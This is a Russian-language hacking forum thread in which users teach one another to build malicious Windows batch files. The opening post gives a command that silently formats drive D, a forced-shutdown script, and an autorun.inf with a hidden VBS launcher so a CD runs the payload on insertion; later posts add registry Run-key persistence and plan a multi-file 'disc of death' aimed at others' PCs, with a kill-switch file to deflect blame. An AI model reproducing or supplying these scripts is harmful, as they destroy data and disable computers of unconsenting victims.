terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!


обитель функций.bat или просто батники!

Сообщений 1 страница 20 из 120

1

бат-файлы, батники, файлы исполнения - всё это одно и то же!
и всё это надо знать! уверяю что это интересно!
представте себе вирус который:  гуляет в инете, розмножаетсякак кроль), грохает винду (не просто а с приколом), заражает любой комп куда попал и самое главное ниодна антивирусная программа, фаетрвол или еще что угодно незаметит (точнее заметит но нехрюкнет :D ) и в нем большими буквами написанно ваше имя...
или пример 2:
вы записали своей девушке диск с музыкой... но дописали прикол), всего 3 скрытых файла... общим весом 3кб ^_^
она вставила его и неуспев ничего нажать видит табличку типа:
http://forumupload.ru/uploads/0002/26/b2/582-1.jpg
потом жмет "ок" и лезет в свою музыку... я думаю она улыбнется ;)
насамом деле всё просто!!!
надо всего лишь выучить пару команд)
например:
copy - копировать
%0 - сам себя тоесть "copy%0" копировать самого себя куда-то...
@echo off - скрыть текст выполнения операций
echo - показать текст -------echo error fuck----- будет написано только "error fuck"
if exist\if not exist - если есть\если нет (файла)
echo y| format D: >null - скрыто форматнуть диск д :rolleyes:
y| - имитировать нажатие клавиши "y" потому что система спросит перед форматированием серьёзно ли вы настроены форматировать и попросит нажать "y" если да или "n" если нет
>null -  скрыто
shutdown - перезапуск системы
shutdown -r\-s - перезагрузка\выключение
-f - принудительно, завершая все процессы
-t 600 - через 10 мин (600 секунд)
-c"*" при этом выдать текст на экран "что угодно вместо звездочки"
edit - блокнот (досовский формат)
goto - идти к (метке)
:* - метка (вместо звездочки нужно написать название метки)
уже из этих команд можно написать вирус)
их немного? неправда ли?
вот так может выглядеть текст батника который выполняет перезагрузку компа:
@echo off
echo пия3дЕц) бу-га-га!!!
if exist C:\ozia.txt goto liza
shutdown -s -f -t 600 -c "hacksoft by ozia"
:liza
:trej
goto trej

где система проста доболи... при запуске файл проверяет есть ли на диске Ц блокнотовский файл "ozia.txt" если есть то пропускает команду перезагрузки и идет к выходу... если нет то выполняет принудительное выключение машины через 10 минут... я небуду розписывать команды всё и так понятно...
так же нам надо что бы этот файл запускался сам! тобешь рядом с этим файлом мы пишем файл "autorun.inf"
тоже создав блокнот просто пишем в нем:

[autorun]
open=null.vbs
open=батник.bat
icon=fuck.ico

где указываем к запуску три файла!!! наш батник который вырубает тачку, файл "null.vbs", и иконка "fuck.ico"
null.vbs создаём та же как и все вписав:

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run"E:\батник.bat ", 0, true

для того что бы скрыто процес выполнения всего этого...
и иконка которая будет отображатся в моём компьютере вместо обычного значка сидирома... её тоже помещаем рядом с файлами...
и так у нас есть 3 файла и иконка...
всё это пишем на диск с инфой (любой) получится что на компе где есть файл ozia.txt  диск откроется а на "чужом" нет...
P.S. - для того что бы на экран было выданно сообщение типа того что на картинке надо в батник добавить:

Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("
текст который вы хотите"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js

удачного создания!

+2

2

Товарисчи, юзайте Batch-язык под Никсами, ибо намного больше возможностей и функционала, более широкая API... Корочь, переходите на Linux (ну или Mac OS X :) )

0

3

а с помощью какой проги эт делается?))

0

4

C помощью блокнота. Пишешь там эту всю пургу и переименовуешь файл в *.bat (если ты об этом)

0

5

прикольно))

0

6

но канечно набор функций ограничен...
но надо уметь лавировать...

+2

7

Спасибо за инфу! +1

Отредактировано LUMEN (2007-12-29 01:06:58)

0

8

нас чёт батника что грохает винду спасиб, нужное дело...пригодится...

0

9

Оооо...Вот про батники это интересна! Хотелось бы побольше комманд Batch... Юзал инет ничего норм внятного кроме этого не нашел!

0

10

ozia написал(а):

люди подскажите пожалуйста что написать в батнике для того что бы он копировал себя в автозагрузку?!!
я пробовал так:
copy%0 C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка
нокомандная строка нечитает руский текст)
как это сделать? я думаю сменить кодировку но немогу! мозгов мало)
и кстати есть какойто файл в винде куда пома прописать автозагрузку? тогда мона и не копировать а просто заставить батник прописатся в том файле который запускает всё что написанно при включении.... ток вот я незнаю какой это файл....
посоветуйте как лучше) потому что у меня появилась гениальная идея как свою девушку порадовать) и я хочу это сделать)

Вот читал твой пост на форуме хоттабыча... Задался примерно такой же идеей...Если через путь не получается может через реестр попробывать?
путь к ключам автозапуска HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run или RunOnce...только будет проблемма сделать так чтобы добовление ключа в реестр было без подтверждения!

Отредактировано Akella (2008-01-02 20:26:39)

0

11

я буду признателен если ты напишешь небольшую статейку как хотя б вручную прописать файл в реестр... я сейчас начну думать как толком это сделать автоматом... пасиб за идею... я думаю что мы вскоре что-то такое простенькое и ядерное напишем что аж руки чешутся!!! ща полезу в реестр...
для тех кто в танке реестр открывается командой regedit в пуске...

0

12

я создаю файл для добавления ключа так:
1.Выполнить>Regedit
2.Проходим по пути HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run(Для создания ключа автозапуска)
3.Жмем Файл>Создать>Строковый параметр
4.Вводим имя нашего параметра например BAT
5.Второй кнопкой мыши, во всплывающем меню тыкаем Изменить.
6.В строке значение пишем путь к файлу который нужно запускать при запуске например C:\batnik.bat
7.Тыкаем Файл>Экспорт. Пишем имя нашему .reg файлу и сохраняем куда надо.
8.Открываем его блокнотом.
Мой пример содержимого reg файл

REGEDIT4 или Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"QIP2005"="C:\\Program Files\\QIP\\qip.exe"
"Download Master"="C:\\Program Files\\Download Master\\dmaster.exe -autorun"
"µTorrent"="\"C:\\Program Files\\uTorrent\\utorrent.exe\""
"DAEMON Tools Lite"="\"C:\\Program Files\\DAEMON Tools Lite\\daemon.exe\""
"BAT"="C:\\batnik.bat"

Удаляем из него все лишнее и получаем то что нам нужно...

REGEDIT4 или Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"BAT"="C:\\batnik.bat"

Сохраняем файл...

И вот мы получили reg файл запускающий батник
C:\batnik.bat

Данный пример описывает создание создания строкового параметра(REG_SZ)
Из него можно вывести простую формулу написания reg файлов

1.Пишем REGEDIT4 или Windows Registry Editor Version 5.00
2.Путь к разделу в квадратных скобках [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
(Если не можете точно прописать путь лучше пользуйтесь первым способом)
3.В кавычках пишем название параметра(любое),ставим = (без пробелов), и путь к файлу, при этом ставим не 1 слеш, а 2! Для тех кто в танке вот эта наклонная палочка правее слеш \

Отредактировано Akella (2008-01-09 15:30:33)

+2

13

+1
я тогда всё проверю на своей тачке и выложу результат....

0

14

ozia написал(а):

+1
я тогда всё проверю на своей тачке и выложу результат....

ну впринципе сделал такую штуку, все получилось...
Недостатки:
1. появляется подтверждение добавления ключа в реестр! при чем в самый неподходящий момент!(впринципе можно исправить время появления).
2. можно делать добавление ключа без рез файла прямо из батника...но увы хз как это делается!
знаю что начало добавления коммандой regedit(ну я думаю это и тебе понятно=)))

0

15

Akella написал(а):

люди подскажите пожалуйста что написать в батнике для того что бы он копировал себя в автозагрузку?!!
я пробовал так:
copy%0 C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка
нокомандная строка нечитает руский текст)
как это сделать? я думаю сменить кодировку но немогу! мозгов мало)
и кстати есть какойто файл в винде куда пома прописать автозагрузку? тогда мона и не копировать а просто заставить батник прописатся в том файле который запускает всё что написанно при включении.... ток вот я незнаю какой это файл....
посоветуйте как лучше) потому что у меня появилась гениальная идея как свою девушку порадовать) и я хочу это сделать)

а если вместо Главное меню\Программы\Автозагрузка написать вот это:

Код:
%C3%EB%E0%E2%ED%EE%E5%20%EC%E5%ED%FE%5C%CF%F0%EE%E3%F0%E0%EC%EC%FB%5C%C0%E2%F2%EE%E7%E0%E3%F0%F3%E7%EA%E0%20

Отредактировано RmXUA (2008-01-04 11:58:10)

0

16

RmXUA надо попробовать...
Akella можно просто симитировать нажатие энтера тем же батником...
я попробую написать это фсе... я уже придумал как...
план:
пишем 4 файла
1 запускает с диска 2-й батник который в свою очередь запускает файл реестра (3), имитирует нажатие энтера (когда выпадает подтверждение кнопка "да" выделена) и копирует нужный батник который будет запускать уже в нужную директорию...
а тот самый 4-й батник при автозапуске уже непосредственно выполняет нужное нам действие!
фсе просто! :cool:

0

17

сделаем так:
я сдесь походу как время будет буду выкладывать по файлу...
и так каждый файл делаем одинаково создаем текстовый документ (блокнот), обязательно откройте розширения
(если кто не знает что такое розширения читаем в разделе "обучение" соответствующую тему)
если вы хотите записать кому-то "диск смерти" то это самый лучший способ для тех кто не умеет писать ни на одном из языков програмирования такой диск сработает абсолютно на любой ХР в независимости какая антивирусная программа там установлена...
единственное как можно избежать запуска это отключить автозапуск чего никто практически не делает... (ни один ламер не отключает)
я думаю что можно так же сделать специальную "фишку" если вас обвинят в том что этот диск грохнул ихнюю винду вы спокойно можете вставит в свой компьютер этот диск и с вашим компьютером ничего непроизойдет если вы создадите на диске ц простой блокнот-файл с названием rel.txt в нем можно написать что-угодно! и при єтом наш диск будет сначала проверять наличие файла на диске ц и если он отсутствует "функции" будут выполнятся если он есть то файл пойдет "на виход"
теперь давайте напишем файл который будет отдавать автозапуску команду на запуск файла который должен скопировать нужные файлы и прописатся в автозагрузку / запустить файл реестра
этот файл будет с розширением "инф" так называемый информационный файл... вы можете найти такие файлы на любом диске с игрушкой... там будет написано опен=сетап.ехе и опен=иконка ну что-то типа этого...
откройте его блокнотом и посмотрите "систему написания"
после создания файла присобачте к нему иконку картинки или муыкального файла... для того что б зашифровать его... и перемешать на диске с другими файлами...
и так файл номер ван!
назовем его "autorun.inf" блокнотовское розширение "тхт" переписываем в "inf"
после чего жмем изменить и он откроется блокнотом... там пишем:

[autorun]
open=loading.bat

фсе) написав там две строчки сохраняем) несмейте после написания крикнуть что-то типа "програмирование это легко!!!"
далее я напишу что надо написать в файле loading.bat

0

18

кстати для того чтоб не выскакивала секундная табличка командной строки мы так же напишем еще один файл... но это в самом конце...
сейчас давайте создадим файл который будет копировать нужный файл в нужную директорию и добавлять информацию в автозагрузку... и так файл номер 2 назовем "loading.bat"

@echo off
if exist C:\rel.txt goto mim
if exist C:\WINDOWS\system\terminal.bat goto min
copy C:\WINDOWS\system\ terminal.bat
if exist C:\WINDOWS\system\regt.reg goto min
copy C:\WINDOWS\system\ regt.reg
:min
C:\WINDOWS\system\regt.reg .|
:mim

это наброски... я продумаю его досконально и наверно перепишу... но впринципе он нормальный)

0

19

Матеро...

0

20

2 проблемы!

C:\WINDOWS\system\regt.reg .|

имитация нажатия энтер вот такой командой " .| " почему-то не прокатывает... я пороюсь в инете поповоду этой функкции...
2 реестры не работают!  точнее работают но неправильно... над этим надо поработать... если руководствоватся инструкцией Akella выкидует ошибку Акелла прошу тебя поработать над этим... я тоже паралельно этим займусь... специально в помощь я выложу в разделе для статей статью про реестр...

0


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!